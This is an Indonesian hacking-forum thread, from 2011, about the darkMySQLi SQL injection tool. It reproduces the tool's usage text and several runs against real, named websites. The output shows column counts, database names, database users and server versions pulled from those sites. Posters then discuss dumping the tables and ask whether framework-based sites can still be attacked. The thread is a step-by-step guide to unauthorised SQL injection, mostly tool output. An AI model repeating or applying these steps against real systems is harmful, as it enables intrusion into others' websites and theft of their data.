(09-14-2011, 09:05 PM)junior.riau18 Wrote: ini mirip schemafuzz hihihihi
ane baru coba di windows yang beginian,,di bt5 belum heheh
(08-31-2011, 09:40 PM)wine trochanter Wrote:
(08-31-2011, 08:43 PM)zee eichel Wrote: tools ini mungkin memang sudah basi .. tapi berhubung ada di backtrack 5 so .. ane rasa mesti ane posting di mari ...hmmm.. jadi bagi teman2 yang sudah tau tentang tools ini harap diam dan biarkan yang lain yang belum tau bisa belajar
darkMySQLi v1.6 [email protected]
forum.darkc0de.com
Usage: ./darkMySQLi.py [options]
Options:
-h, --help shows this help message and exits
-d, --debug display URL debug information
Target:
-u URL, --url=URL Target url
Methodology:
-b, --blind Use blind methodology (req: --string)
-s, --string String to match in page when the query is valid
Method:
--method=PUT Select to use PUT method ** NOT WORKING
Modes:
--dbs Enumerate databases MySQL v5+
--schema Enumerate Information_schema (req: -D,
opt: -T) MySQL v5+
--full Enumerate all we can MySQL v5+
--info MySQL Server configuration MySQL v4+
--fuzz Fuzz Tables & Columns Names MySQL v4+
--findcol Find Column length MySQL v4+
--dump Dump database table entries (req: -T,
opt: -D, -C, --start) MySQL v4+
--crack=HASH Crack MySQL Hashs (req: --wordlist)
--wordlist=LIS.TXT Wordlist to be used for cracking
Define:
-D DB database to enumerate
-T TBL database table to enumerate
-C COL database table column to enumerate
Optional:
--ssl To use SSL
--end To use + and -- for the URLS --end "--" (Default)
To use /**/ and /* for the URLS --end "/*"
--rowdisp Do not display row # when dumping
--start=ROW Row number to begin dumping at
--where=COL,VALUE Use a where clause in your dump
--orderby=COL Use a orderby clause in your dump
--cookie=FILE.TXT Use a Mozilla cookie file
--proxy=PROXY Use a HTTP proxy to connect to the target url
--output=FILE.TXT Output results of tool to this file
Untuk tahap awal kita harus mencari colom dari database situs target
|--------------------------------------------------|
| [email protected] v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.asf.ca/news.php?id=720
[+] 18:07:13
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,
[+] Column Length is: 2
[+] Found null column at column #: 2,
klo situs tadi vurln maka Langkah berikutnya seperti akhir pesan pada toos tersebut "Don't forget to check darkMySQLI.log" maka kita periksa log tersebut yang berada dalam satu directory dengan tools tersebut
[+] URL: http://www.asf.ca/news.php?id=720
[+] 18:45:16
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,
[+] Column Length is: 2
[+] Found null column at column #: 2,
|--------------------------------------------------|
| [email protected] v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.asf.ca/news.php?id=720+AND+1=...1,darkc0de
[+] 18:54:36
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: asfc4477_asfdb
User: asfc4477_asfuser@localhost
Version: 5.1.56-log
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 790
[-] Unexpected error: <class 'urllib2.HTTPError'>
[-] Trying again!
[proxy]: None
[agent]: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[debug]: http://www.asf.ca/news.php?id=720+AND+1=...+LIMIT+0,1--
[-] 18:54:41
[-] Total URL Requests: 3
[-] Done
Don't forget to check darkMySQLi.log
Lankah selanjutnya adalah liat lagi di log tadi
Spoiler! :
|--------------------------------------------------|
| [email protected] v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.asf.ca/news.php?id=720+AND+1=...1,darkc0de
[+] 18:54:36
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[+] Proxy Not Given [+] Gathering MySQL Server Configuration...
Database: asfc4477_asfdb
User: asfc4477_asfuser@localhost
Version: 5.1.56-log
[+] Number of Rows: 790
[-] [18:54:41]
[-] Total URL Requests: 3
[-] Done
Perhatikan lagi yang ane warnai merah
kita sudah mendapatkan nama database, user dan versi ,, masih 5 w0w w0w .. masih ada juga yang make versi 5 ckckckkc
Langkah selanjutnya tinggal dump databasenya kwkwkwkw
bisa pake manual kan udah ada tuh ..
mas saya sudah dapat seperti ini dan cara dumpnya gmna? mash bingung mas
[+] URL: http://mti.ugm.ac.id/~budi/show.php?id=1...e,darkc0de
[+] 20:35:51
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: budi
User: budi@localhost
Version: 5.1.41-3ubuntu12.10
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 29
kk, saya masih bingung yang mana nama table dan column,column padahal saya sudah dapat sampai sini. dilanjut yah coba!
kalo udah dapet replay kk. INGAT JANGAN DIRUSAk itu web. kita hanya belajar. OK
|--------------------------------------------------|
| [email protected] v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.ciptaagro.com/artikel/artikel.php?id=13
[+] 22:05:29
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,3,4,5,
[+] Column Length is: 5
[+] Found null column at column #: 1,2,3,4,
|--------------------------------------------------|
| [email protected] v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://www.ciptaagro.com/artikel/artikel...darkc0de,5
[+] 22:07:13
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ciptaagr_cas_database
User: ciptaagr_cas2@localhost
Version: 5.0.92-community
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 58
om kok ane ga bisa ya ...
pas di bagian --full nongol beginian om :
+] 14:59:22
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Opera/8.00 (Windows NT 5.1; U; en)
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
bro zee, ane mau tanya, apakah itu hanya berlaku untuk situs2 yang masih pake php native ya ?? yang query string nya masih pake tanda tanya '?id=1', nah kalo misalnya ya udah anti SQL injection, model" website sekarang yang udah banyak pake framework gmn ??? apa masih bisa kita hajar pake SQL Injection ??? mohon pencerahan.